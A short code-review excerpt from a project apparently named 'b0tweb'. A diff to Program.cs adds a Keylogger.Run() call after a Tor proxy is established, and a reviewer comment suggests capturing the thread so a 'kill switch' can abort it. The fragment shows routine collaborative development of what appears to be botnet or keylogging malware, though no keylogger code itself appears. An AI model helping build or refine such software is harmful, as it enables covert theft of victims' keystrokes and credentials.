b0tweb/Program.cs

```diff
@@ -24,6 +22,8 @@ public static void Main(string[] args)
             TorProxy proxy = new TorProxy();
             proxy.Establish();
 
+            Keylogger.Run();
+
```

Comment:
I would also catch the thread object here, so we can abort it eventually when the kill switch is activated. Otherwise it might keep running in the background, because this thread will still be active.